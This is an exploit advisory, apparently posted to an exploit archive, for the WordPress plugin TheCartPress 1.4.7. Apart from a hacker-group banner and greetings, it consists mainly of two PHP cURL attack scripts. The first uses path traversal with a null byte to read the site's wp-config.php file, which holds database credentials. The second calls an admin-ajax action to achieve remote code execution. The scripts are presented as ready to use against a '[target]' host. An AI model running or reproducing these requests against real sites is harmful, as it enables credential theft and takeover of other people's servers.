WordPress TheCartPress 1.4.7 Code Execution / Local File Disclosure

Credit: KedAns-Dz
Risk: Medium
Local: Yes
Remote: No

########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : Wordpress Plugin TheCartPress v1.4.7 Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : Multiple # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://thecartpress.com # ########################################### # # [!] Description : # # Wordpress plugin TheCartPress v1.4.7 is suffer from multiple vulnerabilities # remote attacker can disclosure some local files or do a remote code execution. # #### // page : Miranda.class.php // lines : 111.. 115 /* --[1] Local File Include -- */ <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> /* --[2] Remote Code Execution -- */ <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp/admin-ajax.php?action=tcp_miranda_save_admin_panel&class=[RCE]"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; ####

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